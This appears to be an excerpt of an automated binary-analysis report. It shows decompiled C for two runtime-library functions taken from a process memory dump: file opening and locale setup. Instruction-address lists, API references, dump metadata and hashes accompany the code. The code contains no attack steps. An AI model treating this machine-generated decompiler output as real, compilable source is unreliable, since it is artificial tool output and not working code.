                                                                                                C-Code - Quality: 41%
                                                                                                			E004503E9(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                				signed int _v5;
                                                                                                				char _v6;
                                                                                                				void* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr _v36;
                                                                                                				signed int _v44;
                                                                                                				void _v48;
                                                                                                				char _v72;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t114;
                                                                                                				signed int _t123;
                                                                                                				signed char _t124;
                                                                                                				signed int _t134;
                                                                                                				intOrPtr _t164;
                                                                                                				intOrPtr _t180;
                                                                                                				signed int* _t190;
                                                                                                				signed int _t192;
                                                                                                				char _t197;
                                                                                                				signed int _t203;
                                                                                                				signed int _t206;
                                                                                                				signed int _t215;
                                                                                                				signed int _t217;
                                                                                                				signed int _t219;
                                                                                                				signed int _t225;
                                                                                                				signed int _t227;
                                                                                                				signed int _t234;
                                                                                                				signed int _t235;
                                                                                                				signed int _t237;
                                                                                                				signed int _t239;
                                                                                                				signed char _t242;
                                                                                                				intOrPtr _t245;
                                                                                                				void* _t248;
                                                                                                				void* _t252;
                                                                                                				void* _t262;
                                                                                                				signed int _t263;
                                                                                                				signed int _t266;
                                                                                                				signed int _t269;
                                                                                                				signed int _t270;
                                                                                                				void* _t272;
                                                                                                				void* _t274;
                                                                                                				void* _t275;
                                                                                                				void* _t277;
                                                                                                				void* _t278;
                                                                                                				void* _t280;
                                                                                                				void* _t284;
                                                                                                
                                                                                                				_t262 = E0045014C(__ecx,  &_v72, _a16, _a20, _a24);
                                                                                                				_t192 = 6;
                                                                                                				memcpy( &_v48, _t262, _t192 << 2);
                                                                                                				_t274 = _t272 + 0x1c;
                                                                                                				_t248 = _t262 + _t192 + _t192;
                                                                                                				_t263 = _t262 | 0xffffffff;
                                                                                                				if(_v36 != _t263) {
                                                                                                					_t114 = E004497C5(_t248, _t263, __eflags);
                                                                                                					_t190 = _a8;
                                                                                                					 *_t190 = _t114;
                                                                                                					__eflags = _t114 - _t263;
                                                                                                					if(_t114 != _t263) {
                                                                                                						_v20 = _v20 & 0x00000000;
                                                                                                						_v24 = 0xc;
                                                                                                						_t275 = _t274 - 0x18;
                                                                                                						 *_a4 = 1;
                                                                                                						_push(6);
                                                                                                						_v16 =  !(_a16 >> 7) & 1;
                                                                                                						_push( &_v24);
                                                                                                						_push(_a12);
                                                                                                						memcpy(_t275,  &_v48, 1 << 2);
                                                                                                						_t197 = 0;
                                                                                                						_t252 = E004500B7();
                                                                                                						_t277 = _t275 + 0x2c;
                                                                                                						_v12 = _t252;
                                                                                                						__eflags = _t252 - 0xffffffff;
                                                                                                						if(_t252 != 0xffffffff) {
                                                                                                							L11:
                                                                                                							_t123 = GetFileType(_t252);
                                                                                                							__eflags = _t123;
                                                                                                							if(_t123 != 0) {
                                                                                                								__eflags = _t123 - 2;
                                                                                                								if(_t123 != 2) {
                                                                                                									__eflags = _t123 - 3;
                                                                                                									_t124 = _v48;
                                                                                                									if(_t123 == 3) {
                                                                                                										_t124 = _t124 | 0x00000008;
                                                                                                										__eflags = _t124;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t124 = _v48 | 0x00000040;
                                                                                                								}
                                                                                                								_v5 = _t124;
                                                                                                								E0044970E(_t197,  *_t190, _t252);
                                                                                                								_t242 = _v5 | 0x00000001;
                                                                                                								_v5 = _t242;
                                                                                                								_v48 = _t242;
                                                                                                								 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                                                                                                								_t203 =  *_t190;
                                                                                                								_t205 = (_t203 & 0x0000003f) * 0x30;
                                                                                                								__eflags = _a16 & 0x00000002;
                                                                                                								 *((char*)( *((intOrPtr*)(0x46d800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                                                                                                								if((_a16 & 0x00000002) == 0) {
                                                                                                									L20:
                                                                                                									_v6 = 0;
                                                                                                									_push( &_v6);
                                                                                                									_push(_a16);
                                                                                                									_t278 = _t277 - 0x18;
                                                                                                									_t206 = 6;
                                                                                                									_push( *_t190);
                                                                                                									memcpy(_t278,  &_v48, _t206 << 2);
                                                                                                									_t134 = E0044FE6A(_t190,  &_v48 + _t206 + _t206,  &_v48);
                                                                                                									_t280 = _t278 + 0x30;
                                                                                                									__eflags = _t134;
                                                                                                									if(__eflags == 0) {
                                                                                                										 *((char*)( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                                                                                                										 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                                                                                                										__eflags = _v5 & 0x00000048;
                                                                                                										if((_v5 & 0x00000048) == 0) {
                                                                                                											__eflags = _a16 & 0x00000008;
                                                                                                											if((_a16 & 0x00000008) != 0) {
                                                                                                												_t225 =  *_t190;
                                                                                                												_t227 = (_t225 & 0x0000003f) * 0x30;
                                                                                                												_t164 =  *((intOrPtr*)(0x46d800 + (_t225 >> 6) * 4));
                                                                                                												_t87 = _t164 + _t227 + 0x28;
                                                                                                												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                                                                                                												__eflags =  *_t87;
                                                                                                											}
                                                                                                										}
                                                                                                										_t266 = _v44;
                                                                                                										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                                                                                                										if((_t266 & 0xc0000000) != 0xc0000000) {
                                                                                                											L31:
                                                                                                											__eflags = 0;
                                                                                                											return 0;
                                                                                                										} else {
                                                                                                											__eflags = _a16 & 0x00000001;
                                                                                                											if((_a16 & 0x00000001) == 0) {
                                                                                                												goto L31;
                                                                                                											}
                                                                                                											CloseHandle(_v12);
                                                                                                											_v44 = _t266 & 0x7fffffff;
                                                                                                											_t215 = 6;
                                                                                                											_push( &_v24);
                                                                                                											_push(_a12);
                                                                                                											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                                                                                                											_t245 = E004500B7();
                                                                                                											__eflags = _t245 - 0xffffffff;
                                                                                                											if(_t245 != 0xffffffff) {
                                                                                                												_t217 =  *_t190;
                                                                                                												_t219 = (_t217 & 0x0000003f) * 0x30;
                                                                                                												__eflags = _t219;
                                                                                                												 *((intOrPtr*)( *((intOrPtr*)(0x46d800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                                                                                                												goto L31;
                                                                                                											}
                                                                                                											E004388FC(GetLastError());
                                                                                                											 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                                                                											E004498D7( *_t190);
                                                                                                											L10:
                                                                                                											goto L2;
                                                                                                										}
                                                                                                									}
                                                                                                									_t269 = _t134;
                                                                                                									goto L22;
                                                                                                								} else {
                                                                                                									_t269 = E004502C8(_t205,  *_t190);
                                                                                                									__eflags = _t269;
                                                                                                									if(__eflags != 0) {
                                                                                                										L22:
                                                                                                										E0044592B(__eflags,  *_t190);
                                                                                                										return _t269;
                                                                                                									}
                                                                                                									goto L20;
                                                                                                								}
                                                                                                							}
                                                                                                							_t270 = GetLastError();
                                                                                                							E004388FC(_t270);
                                                                                                							 *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46d800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                                                                                                							CloseHandle(_t252);
                                                                                                							__eflags = _t270;
                                                                                                							if(_t270 == 0) {
                                                                                                								 *((intOrPtr*)(E00438932())) = 0xd;
                                                                                                							}
                                                                                                							goto L2;
                                                                                                						}
                                                                                                						_t234 = _v44;
                                                                                                						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                                                                                                						if((_t234 & 0xc0000000) != 0xc0000000) {
                                                                                                							L9:
                                                                                                							_t235 =  *_t190;
                                                                                                							_t237 = (_t235 & 0x0000003f) * 0x30;
                                                                                                							_t180 =  *((intOrPtr*)(0x46d800 + (_t235 >> 6) * 4));
                                                                                                							_t33 = _t180 + _t237 + 0x28;
                                                                                                							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                                                                                							__eflags =  *_t33;
                                                                                                							E004388FC(GetLastError());
                                                                                                							goto L10;
                                                                                                						}
                                                                                                						__eflags = _a16 & 0x00000001;
                                                                                                						if((_a16 & 0x00000001) == 0) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						_t284 = _t277 - 0x18;
                                                                                                						_v44 = _t234 & 0x7fffffff;
                                                                                                						_t239 = 6;
                                                                                                						_push( &_v24);
                                                                                                						_push(_a12);
                                                                                                						memcpy(_t284,  &_v48, _t239 << 2);
                                                                                                						_t197 = 0;
                                                                                                						_t252 = E004500B7();
                                                                                                						_t277 = _t284 + 0x2c;
                                                                                                						_v12 = _t252;
                                                                                                						__eflags = _t252 - 0xffffffff;
                                                                                                						if(_t252 != 0xffffffff) {
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						goto L9;
                                                                                                					} else {
                                                                                                						 *(E0043891F()) =  *_t186 & 0x00000000;
                                                                                                						 *_t190 = _t263;
                                                                                                						 *((intOrPtr*)(E00438932())) = 0x18;
                                                                                                						goto L2;
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *(E0043891F()) =  *_t188 & 0x00000000;
                                                                                                					 *_a8 = _t263;
                                                                                                					L2:
                                                                                                					return  *((intOrPtr*)(E00438932()));
                                                                                                				}
                                                                                                			}

                                                                                                0x004505b5
                                                                                                0x004505c0
                                                                                                0x004505c5
                                                                                                0x004505d5
                                                                                                0x004505d8
                                                                                                0x004505dc
                                                                                                0x004505dd
                                                                                                0x004505e3
                                                                                                0x004505e8
                                                                                                0x004505eb
                                                                                                0x004505ed
                                                                                                0x004505ef
                                                                                                0x004505f4
                                                                                                0x004505f7
                                                                                                0x004505f9
                                                                                                0x00450623
                                                                                                0x00450647
                                                                                                0x0045064b
                                                                                                0x0045064f
                                                                                                0x00450651
                                                                                                0x00450655
                                                                                                0x00450657
                                                                                                0x00450661
                                                                                                0x00450664
                                                                                                0x0045066b
                                                                                                0x0045066b
                                                                                                0x0045066b
                                                                                                0x0045066b
                                                                                                0x00450655
                                                                                                0x00450670
                                                                                                0x0045067c
                                                                                                0x0045067e
                                                                                                0x00450709
                                                                                                0x00450709
                                                                                                0x00000000
                                                                                                0x00450684
                                                                                                0x00450684
                                                                                                0x00450688
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0045068d
                                                                                                0x0045069f
                                                                                                0x004506a7
                                                                                                0x004506aa
                                                                                                0x004506ab
                                                                                                0x004506ae
                                                                                                0x004506b5
                                                                                                0x004506ba
                                                                                                0x004506bd
                                                                                                0x004506f1
                                                                                                0x004506fb
                                                                                                0x004506fb
                                                                                                0x00450705
                                                                                                0x00000000
                                                                                                0x00450705
                                                                                                0x004506c6
                                                                                                0x004506df
                                                                                                0x004506e6
                                                                                                0x00450509
                                                                                                0x00000000
                                                                                                0x00450509
                                                                                                0x0045067e
                                                                                                0x004505fb
                                                                                                0x00000000
                                                                                                0x004505c7
                                                                                                0x004505ce
                                                                                                0x004505d1
                                                                                                0x004505d3
                                                                                                0x004505fd
                                                                                                0x004505ff
                                                                                                0x00000000
                                                                                                0x00450605
                                                                                                0x00000000
                                                                                                0x004505d3
                                                                                                0x004505c5
                                                                                                0x00450520
                                                                                                0x00450523
                                                                                                0x0045053e
                                                                                                0x00450543
                                                                                                0x00450549
                                                                                                0x0045054b
                                                                                                0x00450556
                                                                                                0x00450556
                                                                                                0x00000000
                                                                                                0x0045054b
                                                                                                0x004504a4
                                                                                                0x004504ab
                                                                                                0x004504ad
                                                                                                0x004504e4
                                                                                                0x004504e4
                                                                                                0x004504ee
                                                                                                0x004504f1
                                                                                                0x004504f8
                                                                                                0x004504f8
                                                                                                0x004504f8
                                                                                                0x00450504
                                                                                                0x00000000
                                                                                                0x00450504
                                                                                                0x004504af
                                                                                                0x004504b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004504b5
                                                                                                0x004504c4
                                                                                                0x004504c9
                                                                                                0x004504cc
                                                                                                0x004504cd
                                                                                                0x004504d0
                                                                                                0x004504d0
                                                                                                0x004504d7
                                                                                                0x004504d9
                                                                                                0x004504dc
                                                                                                0x004504df
                                                                                                0x004504e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00450442
                                                                                                0x00450447
                                                                                                0x0045044a
                                                                                                0x00450451
                                                                                                0x00000000
                                                                                                0x00450451
                                                                                                0x0045041b
                                                                                                0x00450420
                                                                                                0x00450426
                                                                                                0x00450428
                                                                                                0x00000000
                                                                                                0x0045042d

                                                                                                APIs
                                                                                                  • Part of subcall function 004500B7: CreateFileW.KERNEL32(00000000,00000000,?,00450492,?,?,00000000,?,00450492,00000000,0000000C), ref: 004500D4
                                                                                                • GetLastError.KERNEL32 ref: 004504FD
                                                                                                • __dosmaperr.LIBCMT ref: 00450504
                                                                                                • GetFileType.KERNEL32(00000000), ref: 00450510
                                                                                                • GetLastError.KERNEL32 ref: 0045051A
                                                                                                • __dosmaperr.LIBCMT ref: 00450523
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00450543
                                                                                                • CloseHandle.KERNEL32(?), ref: 0045068D
                                                                                                • GetLastError.KERNEL32 ref: 004506BF
                                                                                                • __dosmaperr.LIBCMT ref: 004506C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID:
                                                                                                • API String ID: 4237864984-0
                                                                                                • Opcode ID: bc6ac7719f8584b99d2aab54986c79b3f80391739fd99fa02d0700e1e31c9e02
                                                                                                • Instruction ID: 24b0630b683e3dafc188abe34d5ade8191c39c2f4f45073fca99a1b504bde73c
                                                                                                • Opcode Fuzzy Hash: bc6ac7719f8584b99d2aab54986c79b3f80391739fd99fa02d0700e1e31c9e02
                                                                                                • Instruction Fuzzy Hash: 75A14935A102049FDF18EF68D8517AE7BA0AF46325F14015EFC119F392DB398D16CB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E0043FCAE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                                                                                				signed int _v8;
                                                                                                				short _v270;
                                                                                                				short _v272;
                                                                                                				char _v528;
                                                                                                				char _v700;
                                                                                                				signed int _v704;
                                                                                                				signed int _v708;
                                                                                                				short _v710;
                                                                                                				signed int* _v712;
                                                                                                				signed int _v716;
                                                                                                				signed int _v720;
                                                                                                				signed int _v724;
                                                                                                				signed int* _v728;
                                                                                                				signed int _v732;
                                                                                                				signed int _v736;
                                                                                                				signed int _v740;
                                                                                                				signed int _v744;
                                                                                                				signed int _t149;
                                                                                                				void* _t156;
                                                                                                				signed int _t157;
                                                                                                				signed int _t158;
                                                                                                				intOrPtr _t159;
                                                                                                				signed int _t162;
                                                                                                				signed int _t166;
                                                                                                				signed int _t167;
                                                                                                				intOrPtr _t169;
                                                                                                				signed int _t172;
                                                                                                				signed int _t173;
                                                                                                				signed int _t175;
                                                                                                				signed int _t195;
                                                                                                				signed int _t196;
                                                                                                				signed int _t199;
                                                                                                				signed int _t204;
                                                                                                				signed int _t207;
                                                                                                				intOrPtr* _t213;
                                                                                                				intOrPtr* _t214;
                                                                                                				signed int _t225;
                                                                                                				signed int _t228;
                                                                                                				intOrPtr* _t229;
                                                                                                				signed int _t231;
                                                                                                				signed int* _t235;
                                                                                                				void* _t243;
                                                                                                				signed int _t244;
                                                                                                				intOrPtr _t246;
                                                                                                				signed int _t251;
                                                                                                				signed int _t253;
                                                                                                				signed int _t257;
                                                                                                				signed int* _t258;
                                                                                                				intOrPtr* _t259;
                                                                                                				short _t260;
                                                                                                				signed int _t262;
                                                                                                				signed int _t264;
                                                                                                				void* _t266;
                                                                                                				void* _t268;
                                                                                                
                                                                                                				_t262 = _t264;
                                                                                                				_t149 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t149 ^ _t262;
                                                                                                				_push(__ebx);
                                                                                                				_t207 = _a8;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t246 = _a4;
                                                                                                				_v744 = _t207;
                                                                                                				_v728 = E00442F68(_t207, __ecx, __edx) + 0x278;
                                                                                                				_push( &_v708);
                                                                                                				_t156 = E0043F3F8(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                                                                                                				_t266 = _t264 - 0x2e4 + 0x18;
                                                                                                				if(_t156 != 0) {
                                                                                                					_t11 = _t207 + 2; // 0x6
                                                                                                					_t251 = _t11 << 4;
                                                                                                					__eflags = _t251;
                                                                                                					_t157 =  &_v272;
                                                                                                					_v716 = _t251;
                                                                                                					_t213 =  *((intOrPtr*)(_t251 + _t246));
                                                                                                					while(1) {
                                                                                                						_v704 = _v704 & 0x00000000;
                                                                                                						__eflags =  *_t157 -  *_t213;
                                                                                                						_t253 = _v716;
                                                                                                						if( *_t157 !=  *_t213) {
                                                                                                							break;
                                                                                                						}
                                                                                                						__eflags =  *_t157;
                                                                                                						if( *_t157 == 0) {
                                                                                                							L8:
                                                                                                							_t158 = _v704;
                                                                                                						} else {
                                                                                                							_t260 =  *((intOrPtr*)(_t157 + 2));
                                                                                                							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                                                                                                							_v710 = _t260;
                                                                                                							_t253 = _v716;
                                                                                                							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                                                                                                								break;
                                                                                                							} else {
                                                                                                								_t157 = _t157 + 4;
                                                                                                								_t213 = _t213 + 4;
                                                                                                								__eflags = _v710;
                                                                                                								if(_v710 != 0) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L8;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L10:
                                                                                                						__eflags = _t158;
                                                                                                						if(_t158 != 0) {
                                                                                                							_t214 =  &_v272;
                                                                                                							_t243 = _t214 + 2;
                                                                                                							do {
                                                                                                								_t159 =  *_t214;
                                                                                                								_t214 = _t214 + 2;
                                                                                                								__eflags = _t159 - _v704;
                                                                                                							} while (_t159 != _v704);
                                                                                                							_v720 = (_t214 - _t243 >> 1) + 1;
                                                                                                							_t162 = E00440C6C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                                                                                                							_v732 = _t162;
                                                                                                							__eflags = _t162;
                                                                                                							if(_t162 == 0) {
                                                                                                								goto L1;
                                                                                                							} else {
                                                                                                								_v724 =  *((intOrPtr*)(_t253 + _t246));
                                                                                                								_t35 = _t207 * 4; // 0xb8bf
                                                                                                								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                                                                                                								_t38 = _t246 + 8; // 0x8b56ff8b
                                                                                                								_v740 =  *_t38;
                                                                                                								_t223 =  &_v272;
                                                                                                								_v712 = _t162 + 4;
                                                                                                								_t166 = E004428B4(_t162 + 4, _v720,  &_v272);
                                                                                                								_t268 = _t266 + 0xc;
                                                                                                								__eflags = _t166;
                                                                                                								if(_t166 != 0) {
                                                                                                									_t167 = _v704;
                                                                                                									_push(_t167);
                                                                                                									_push(_t167);
                                                                                                									_push(_t167);
                                                                                                									_push(_t167);
                                                                                                									_push(_t167);
                                                                                                									E00437736();
                                                                                                									asm("int3");
                                                                                                									_t169 =  *0x46d508; // 0x0
                                                                                                									return _t169;
                                                                                                								} else {
                                                                                                									__eflags = _v272 - 0x43;
                                                                                                									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                                                                                                									if(_v272 != 0x43) {
                                                                                                										L19:
                                                                                                										_t172 = E0043F105(_t207, _t223, _t246,  &_v700);
                                                                                                										_t225 = _v704;
                                                                                                										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                                                                                                									} else {
                                                                                                										__eflags = _v270;
                                                                                                										if(_v270 != 0) {
                                                                                                											goto L19;
                                                                                                										} else {
                                                                                                											_t225 = _v704;
                                                                                                											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags = _t207 - 2;
                                                                                                									if(_t207 != 2) {
                                                                                                										__eflags = _t207 - 1;
                                                                                                										if(_t207 != 1) {
                                                                                                											__eflags = _t207 - 5;
                                                                                                											if(_t207 == 5) {
                                                                                                												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                                                                                                											}
                                                                                                										} else {
                                                                                                											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t258 = _v728;
                                                                                                										_t244 = _t225;
                                                                                                										_t235 = _t258;
                                                                                                										 *(_t246 + 8) = _v708;
                                                                                                										_v712 = _t258;
                                                                                                										_v720 = _t258[8];
                                                                                                										_v708 = _t258[9];
                                                                                                										while(1) {
                                                                                                											_t64 = _t246 + 8; // 0x8b56ff8b
                                                                                                											__eflags =  *_t64 -  *_t235;
                                                                                                											if( *_t64 ==  *_t235) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t259 = _v712;
                                                                                                											_t244 = _t244 + 1;
                                                                                                											_t204 =  *_t235;
                                                                                                											 *_t259 = _v720;
                                                                                                											_v708 = _t235[1];
                                                                                                											_t235 = _t259 + 8;
                                                                                                											 *((intOrPtr*)(_t259 + 4)) = _v708;
                                                                                                											_t207 = _v744;
                                                                                                											_t258 = _v728;
                                                                                                											_v720 = _t204;
                                                                                                											_v712 = _t235;
                                                                                                											__eflags = _t244 - 5;
                                                                                                											if(_t244 < 5) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                											}
                                                                                                											L27:
                                                                                                											__eflags = _t244 - 5;
                                                                                                											if(__eflags == 0) {
                                                                                                												_t88 = _t246 + 8; // 0x8b56ff8b
                                                                                                												_t195 = E0044A5FC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x458488, 0x7f,  &_v528,  *_t88, 1);
                                                                                                												_t268 = _t268 + 0x1c;
                                                                                                												__eflags = _t195;
                                                                                                												_t196 = _v704;
                                                                                                												if(_t195 == 0) {
                                                                                                													_t258[1] = _t196;
                                                                                                												} else {
                                                                                                													do {
                                                                                                														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                                                                                                														_t196 = _t196 + 1;
                                                                                                														__eflags = _t196 - 0x7f;
                                                                                                													} while (_t196 < 0x7f);
                                                                                                													_t199 = E00434641( &_v528,  *0x46c160, 0xfe);
                                                                                                													_t268 = _t268 + 0xc;
                                                                                                													__eflags = _t199;
                                                                                                													_t258[1] = 0 | _t199 == 0x00000000;
                                                                                                												}
                                                                                                												_t103 = _t246 + 8; // 0x8b56ff8b
                                                                                                												 *_t258 =  *_t103;
                                                                                                											}
                                                                                                											 *(_t246 + 0x18) = _t258[1];
                                                                                                											goto L38;
                                                                                                										}
                                                                                                										__eflags = _t244;
                                                                                                										if(_t244 != 0) {
                                                                                                											 *_t258 =  *(_t258 + _t244 * 8);
                                                                                                											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                                                                                                											 *(_t258 + _t244 * 8) = _v720;
                                                                                                											 *(_t258 + 4 + _t244 * 8) = _v708;
                                                                                                										}
                                                                                                										goto L27;
                                                                                                									}
                                                                                                									L38:
                                                                                                									_t173 = _t207 * 0xc;
                                                                                                									_t110 = _t173 + 0x4583c8; // 0x40ddd6
                                                                                                									 *0x45449c(_t246);
                                                                                                									_t175 =  *((intOrPtr*)( *_t110))();
                                                                                                									_t228 = _v724;
                                                                                                									__eflags = _t175;
                                                                                                									if(_t175 == 0) {
                                                                                                										__eflags = _t228 - 0x46c298;
                                                                                                										if(_t228 != 0x46c298) {
                                                                                                											_t257 = _t207 + _t207;
                                                                                                											__eflags = _t257;
                                                                                                											asm("lock xadd [eax], ecx");
                                                                                                											if(_t257 != 0) {
                                                                                                												goto L43;
                                                                                                											} else {
                                                                                                												_t128 = _t257 * 8; // 0x30ff068b
                                                                                                												E004414D5( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                                                                                                												_t131 = _t257 * 8; // 0x30ff0c46
                                                                                                												E004414D5( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                                                                                                												_t134 = _t207 * 4; // 0xb8bf
                                                                                                												E004414D5( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                                                                                                												_t231 = _v704;
                                                                                                												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                                                                                                												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                                                                                                											}
                                                                                                										}
                                                                                                										_t229 = _v732;
                                                                                                										 *_t229 = 1;
                                                                                                										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                                                                                                									} else {
                                                                                                										 *(_v716 + _t246) = _t228;
                                                                                                										_t115 = _t207 * 4; // 0xb8bf
                                                                                                										E004414D5( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                                                                                                										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                                                                                                										E004414D5(_v732);
                                                                                                										 *(_t246 + 8) = _v740;
                                                                                                										goto L1;
                                                                                                									}
                                                                                                									goto L2;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							goto L2;
                                                                                                						}
                                                                                                						goto L47;
                                                                                                					}
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t158 = _t157 | 0x00000001;
                                                                                                					__eflags = _t158;
                                                                                                					goto L10;
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					L2:
                                                                                                					return E00430A5B(_v8 ^ _t262);
                                                                                                				}
                                                                                                				L47:
                                                                                                			}
                                                                                                0x0043fe24
                                                                                                0x0043fe27
                                                                                                0x0043fe42
                                                                                                0x0043fe49
                                                                                                0x0043fe4f
                                                                                                0x0043fe55
                                                                                                0x0043fe29
                                                                                                0x0043fe29
                                                                                                0x0043fe31
                                                                                                0x00000000
                                                                                                0x0043fe33
                                                                                                0x0043fe33
                                                                                                0x0043fe39
                                                                                                0x0043fe39
                                                                                                0x0043fe31
                                                                                                0x0043fe5c
                                                                                                0x0043fe5f
                                                                                                0x0043ff7c
                                                                                                0x0043ff7f
                                                                                                0x0043ff8c
                                                                                                0x0043ff8f
                                                                                                0x0043ff97
                                                                                                0x0043ff97
                                                                                                0x0043ff81
                                                                                                0x0043ff87
                                                                                                0x0043ff87
                                                                                                0x0043fe65
                                                                                                0x0043fe65
                                                                                                0x0043fe6b
                                                                                                0x0043fe73
                                                                                                0x0043fe75
                                                                                                0x0043fe78
                                                                                                0x0043fe81
                                                                                                0x0043fe8a
                                                                                                0x0043fe90
                                                                                                0x0043fe90
                                                                                                0x0043fe93
                                                                                                0x0043fe95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fe97
                                                                                                0x0043fe9d
                                                                                                0x0043fe9e
                                                                                                0x0043fea9
                                                                                                0x0043feb1
                                                                                                0x0043feb9
                                                                                                0x0043febc
                                                                                                0x0043febf
                                                                                                0x0043fec5
                                                                                                0x0043fecb
                                                                                                0x0043fed1
                                                                                                0x0043fed7
                                                                                                0x0043feda
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fedc
                                                                                                0x0043ff01
                                                                                                0x0043ff01
                                                                                                0x0043ff04
                                                                                                0x0043ff08
                                                                                                0x0043ff21
                                                                                                0x0043ff26
                                                                                                0x0043ff29
                                                                                                0x0043ff2b
                                                                                                0x0043ff31
                                                                                                0x0043ff6c
                                                                                                0x0043ff33
                                                                                                0x0043ff33
                                                                                                0x0043ff38
                                                                                                0x0043ff40
                                                                                                0x0043ff41
                                                                                                0x0043ff41
                                                                                                0x0043ff58
                                                                                                0x0043ff5f
                                                                                                0x0043ff62
                                                                                                0x0043ff67
                                                                                                0x0043ff67
                                                                                                0x0043ff6f
                                                                                                0x0043ff72
                                                                                                0x0043ff72
                                                                                                0x0043ff77
                                                                                                0x00000000
                                                                                                0x0043ff77
                                                                                                0x0043fede
                                                                                                0x0043fee0
                                                                                                0x0043fee5
                                                                                                0x0043feeb
                                                                                                0x0043fef4
                                                                                                0x0043fefd
                                                                                                0x0043fefd
                                                                                                0x00000000
                                                                                                0x0043fee0
                                                                                                0x0043ff9a
                                                                                                0x0043ff9a
                                                                                                0x0043ff9e
                                                                                                0x0043ffa6
                                                                                                0x0043ffac
